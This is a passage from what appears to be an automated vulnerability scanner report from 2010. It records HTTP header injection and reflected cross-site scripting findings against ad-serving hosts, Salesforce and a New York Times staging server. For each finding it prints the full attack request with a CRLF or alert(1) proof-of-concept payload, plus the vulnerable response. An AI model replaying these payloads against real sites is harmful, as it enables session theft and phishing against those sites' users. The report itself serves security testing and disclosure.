User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7d98a
59d7a244a36
/N4300.NYTimes/B5008440.7:
Date: Mon, 15 Nov 2010 11:44:07 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

3.5. http://ad.vulnerable.ad.partner/adj/N5047.nytimes.com/B4921701.5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N5047.nytimes.com/B4921701.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 72682%0d%0a5799f80cf0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /72682%0d%0a5799f80cf0/N5047.nytimes.com/B4921701.5;sz=300x250;pc=nyt147899_246776;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=University_of_Phoenix_1533295_01-nyt3&ad=uofp-300x250-B4921701.5&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802074&sn1=5534326f/3bfe39b9&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/72682
5799f80cf0
/N5047.nytimes.com/B4921701.5;sz=300x250;pc=nyt147899_246776;ord=2010.11.15.07.15.33;click=http: //www.nytimes.com/adx/bin/adx_click.html
Date: Mon, 15 Nov 2010 07:22:20 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.6. http://ad.vulnerable.ad.partner/adj/N553.newyorktimes.com/B4763885.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N553.newyorktimes.com/B4763885.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 36239%0d%0ad7834691ffb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /36239%0d%0ad7834691ffb/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=TopAd&camp=Amex_PersSavings_Q4-2010_03_1513970-nyt1&ad=728x90_Remnant_ROS_B4763885.2&sn2=6eff218/e43bef4&snr=doubleclick&snx=1289802071&sn1=f9dd9d37/efa65b8&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/36239
d7834691ffb
/N553.newyorktimes.com/B4763885.2;sz=728x90;pc=nyt146048_244044;ord=2010.11.15.07.15.11;click=http: //www.nytimes.com/adx/bin/adx_click.html
Date: Mon, 15 Nov 2010 07:20:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.7. http://ad.vulnerable.ad.partner/adj/N636.276948.NYTIMES/B4871537.31 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N636.276948.NYTIMES/B4871537.31

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 89338%0d%0ae8e383c05b0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /89338%0d%0ae8e383c05b0/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=JM07_1464984_nyt8&ad=ROS_PreEmpt_BA2&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802073&sn1=202bf1a7/adef6a1b&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/89338
e8e383c05b0
/N636.276948.NYTIMES/B4871537.31;sz=336x280;pc=nyt146535_247381;ord=2010.11.15.07.15.37;click=http: //www.nytimes.com/adx/bin/adx_click.html
Date: Mon, 15 Nov 2010 07:22:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.8. http://na.link.decdna.net/n/80094/80572/www.sap.com/1043fg1 [11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.link.decdna.net
Path:   /n/80094/80572/www.sap.com/1043fg1

Issue detail

The value of the 11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq request parameter is copied into the location response header. The payload b8461%0d%0adb4a5794385 was submitted in the 11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq parameter. This caused a response containing an injected HTTP header.

Request

GET /n/80094/80572/www.sap.com/1043fg1;11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq=b8461%0d%0adb4a5794385&247cr=6349709945/x22 HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:41:26 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Mon, 15 Nov 2010 09:41:26 GMT
location: http://www.sap.comb8461
db4a5794385

Set-Cookie: %2edecdna%2enet/%2fn%2f80094/2/e=1289814086/80094/80572/1/0//8///769481856/0/0/109278422///0/1289814086/ct%2c/0/http%3a%2f%2fwww%2esap%2ecomb8461%0d%0adb4a5794385/26481749/0; expires=Wed, 15-Dec-2010 09:41:26 GMT; path=/n/80094; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9304437677715620207; expires=Tue, 15-Nov-2011 09:41:26 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9304437677698843084; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


3.9. http://na.link.decdna.net/n/80094/80572/www.sap.com/1043fg1 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.link.decdna.net
Path:   /n/80094/80572/www.sap.com/1043fg1

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload f7f81%0d%0a4d471187b11 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/80094/80572/f7f81%0d%0a4d471187b11/1043fg1;11;4;;8;;cq4o00;1t27rq;;frlg5;;1;/i/c?0&pq=%2fmk%2fget%2fSEA13%3fSOURCEID%3d41%26campaigncode%3dCRM%2dXJ10%2dUSM%2dSEARCH18%26source%3dmsgsdkwus01%26tnt%3dcloud%26kw%3dcloud%2bcomputing%26dna%3d%3cx%3dthirdPartyTracking%28%27%2c%27%2c1%2c255%29%3e&247cr=6349709945/x22 HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:41:27 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Mon, 15 Nov 2010 09:41:27 GMT
location: http://f7f81
4d471187b11
/mk/get/SEA13?SOURCEID=41&campaigncode=CRM-XJ10-USM-SEARCH18&source=msgsdkwus01&tnt=cloud&kw=cloud+computing&dna=<x=thirdPartyTracking(',',1,255)>
Set-Cookie: %2edecdna%2enet/%2fn%2f80094/2/e=1289814087/80094/80572/1/0//8///769481856/0/0/109278422///0/1289814087/ct%2c/0/http%3a%2f%2ff7f81%0d%0a4d471187b11%2fmk%2fget%2fSEA13%3fSOURCEID%3d41%26campaigncode%3dCRM%2dXJ10%2dUSM%2dSEARCH18%26source%3dmsgsdkwus01%26tnt%3dcloud%26kw%3dcloud%252bcomputing%26dna%3d80572%252c8%252c0%252c109278422%252c769481856%252c1289814087%252c%252c26481749%252c0/26481749/0; expires=Wed, 15-Dec-2010 09:41:27 GMT; path=/n/80094; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9322452076560646501; expires=Tue, 15-Nov-2011 09:41:27 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9322452076560646613; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


3.10. http://pixel2233.everesttech.net/2233/rq/3/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel2233.everesttech.net
Path:   /2233/rq/3/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22

Issue detail

The value of REST URL parameter 3 is copied into the Set-Cookie response header. The payload 72cdf%0d%0a2b3a821784 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /2233/rq/72cdf%0d%0a2b3a821784/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 HTTP/1.1
Host: pixel2233.everesttech.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:43:05 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k
Set-Cookie: everest_session_v2=NM1M4QCpAAAANmo; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~NM1M4QCpAAAANmo; path=/; domain=.everesttech.net; expires=Mon, 19-Nov-2029 20:23:05 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache, max-age=0
Set-Cookie: everest_cookie=ev_surferid~NM1M4QCpAAAANmo~ev_uid~2233~ev_sid~72cdf
2b3a821784
~ev_clientid~s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online storage~ev_clickid~NM1M4QCpAAAANmo~ev_clicktime~20101115094305; path=/; domain=pixel2233.everesttech.net; expires=Mon, 19-Nov-2029 20:23:05 GMT
Location: http://shop.trendmicro.com/safesync/sem/buy/10/?cm_mmc=Value_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22&ef_id=NM1M4QCpAAAANmo:20101115094305:s
Expires: Mon, 15 Nov 2010 09:43:05 GMT
Content-Length: 472
Keep-Alive: timeout=15, max=672
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://shop.trendmicro.com/safesync/sem/buy/10/
...[SNIP]...

3.11. http://pixel2233.everesttech.net/2233/rq/3/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel2233.everesttech.net
Path:   /2233/rq/3/s_822dde7434ea9b486d9ca7c3d12fd092_5974773514_online%20storage/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22

Issue detail

The value of REST URL parameter 4 is copied into the Set-Cookie response header. The payload c925c%0d%0aeac5f79dbde was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /2233/rq/3/c925c%0d%0aeac5f79dbde/url=http%3A/shop.trendmicro.com/safesync/sem/buy/10/%3Fcm_mmc%3DValue_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22 HTTP/1.1
Host: pixel2233.everesttech.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 15 Nov 2010 09:43:06 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8k
Set-Cookie: everest_session_v2=MyRM4QCqAQAAIkQ; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~MyRM4QCqAQAAIkQ; path=/; domain=.everesttech.net; expires=Mon, 19-Nov-2029 20:23:06 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache, max-age=0
Set-Cookie: everest_cookie=ev_surferid~MyRM4QCqAQAAIkQ~ev_uid~2233~ev_sid~3~ev_clientid~c925c
eac5f79dbde
~ev_clickid~MyRM4QCqAQAAIkQ~ev_clicktime~20101115094306; path=/; domain=pixel2233.everesttech.net; expires=Mon, 19-Nov-2029 20:23:06 GMT
Location: http://shop.trendmicro.com/safesync/sem/buy/10/?cm_mmc=Value_US-_-SafeSync-_-Trend_Micro_SafeSync_Storage-_-Online_Storage/x22&ef_id=MyRM4QCqAQAAIkQ:20101115094306:s
Expires: Mon, 15 Nov 2010 09:43:06 GMT
Content-Length: 472
Keep-Alive: timeout=15, max=973
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://shop.trendmicro.com/safesync/sem/buy/10/
...[SNIP]...

3.12. http://www.salesforce.com/cloudcomputing/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /cloudcomputing/x22

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d985f%0d%0a0cf54ea3fe2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d985f%0d%0a0cf54ea3fe2/x22 HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /d985f
0cf54ea3fe2
/x22/
Date: Mon, 15 Nov 2010 10:48:03 GMT
Connection: close
Content-Length: 85

The URL has moved to <a href="/d985f
0cf54ea3fe2/x22/">/d985f
0cf54ea3fe2/x22/</a>

3.13. http://www.salesforce.com/cloudcomputing/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.salesforce.com
Path:   /cloudcomputing/x22

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 6b2a5%0d%0abc8e8fdeedd was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /cloudcomputing/6b2a5%0d%0abc8e8fdeedd HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /cloudcomputing/6b2a5
bc8e8fdeedd
/
Date: Mon, 15 Nov 2010 10:48:04 GMT
Connection: close
Content-Length: 107

The URL has moved to <a href="/cloudcomputing/6b2a5
bc8e8fdeedd/">/cloudcomputing/6b2a5
bc8e8fdeedd/</a>

3.14. https://www.salesforce.com/form/signup/freeforce-platform-sem.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.salesforce.com
Path:   /form/signup/freeforce-platform-sem.jsp

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 36d77%0d%0ac41153cb8fb was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /form/signup/36d77%0d%0ac41153cb8fb HTTP/1.1
Host: www.salesforce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: SFDC
Location: /form/signup/36d77
c41153cb8fb
/
Date: Mon, 15 Nov 2010 10:48:08 GMT
Connection: close
Content-Length: 101

The URL has moved to <a href="/form/signup/36d77
c41153cb8fb/">/form/signup/36d77
c41153cb8fb/</a>

4. Cross-site scripting (reflected)  previous  next
There are 617 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://209.11.106.150/NYTULS_FSBOStaging/default.asp [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://209.11.106.150
Path:   /NYTULS_FSBOStaging/default.asp

Issue detail

The value of the CategoryID request parameter is copied into a JavaScript rest-of-line comment. The payload 80331%0aalert(1)//da7467547cd was submitted in the CategoryID parameter. This input was echoed as 80331
alert(1)//da7467547cd
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /NYTULS_FSBOStaging/default.asp?CategoryID=BIZDIR80331%0aalert(1)//da7467547cd HTTP/1.1
Host: 209.11.106.150
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 11:19:18 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 25743
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAAQTADCQ=BMIBILIAJOFCDJHKDMMIHHEA; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>The New York Times: Classified Marketplace Place an Ad</TITLE>
<meta name="keywords" content="Classified Marketp
...[SNIP]...
<SCRIPT TYPE="text/javascript">
//-------------------------------------------------------------------------
function Check_Step1()
{
   var chk = "N"
   //if ('BIZDIR80331
alert(1)//da7467547cd
' != 'BOSWTS')
   //{
       //document.ListingType.LTypeId.checked = true;
       //return true
   //}    

   for (i = 0; i < document.ListingType.LTypeId.length; i ++) {
       if (document.ListingType.LTypeId[i].ch
...[SNIP]...

4.2. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e821b"-alert(1)-"5f7083f8c15 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpte821b"-alert(1)-"5f7083f8c15&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmpte821b"-alert(1)-"5f7083f8c15&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "op
...[SNIP]...

4.3. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [ad parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f98f2'-alert(1)-'bb5252f170b was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmptf98f2'-alert(1)-'bb5252f170b&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Oct 14 15:08:45 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt4&ad=Hyatt_Respire_300_PreEmptf98f2'-alert(1)-'bb5252f170b&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto=http://www.respire.hyatt.com?src=agn_hhc_ba_nyt\">
...[SNIP]...

4.4. http://ad.vulnerable.ad.partner/adj/N4300.NYTimes/B4933145 [camp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N4300.NYTimes/B4933145

Issue detail

The value of the camp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61202"-alert(1)-"7b65acf75e6 was submitted in the camp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4300.NYTimes/B4933145;sz=300x250;pc=nyt147582_246220;ord=2010.11.15.07.15.33;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=listings.nytimes.com/BusinessDirectory&pos=SFMiddle&camp=Hyatt_Respire_Winter_2010_1516976-nyt461202"-alert(1)-"7b65acf75e6&ad=Hyatt_Respire_300_PreEmpt&sn2=d5f24c71/32beb1e3&snr=doubleclick&snx=1289802072&sn1=f35fce60/c8fa649a&goto= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Proxy-Connection: Keep-Alive
Host: ad.vulnerable.ad.partner
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 15 Nov 2010 07:19:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6563

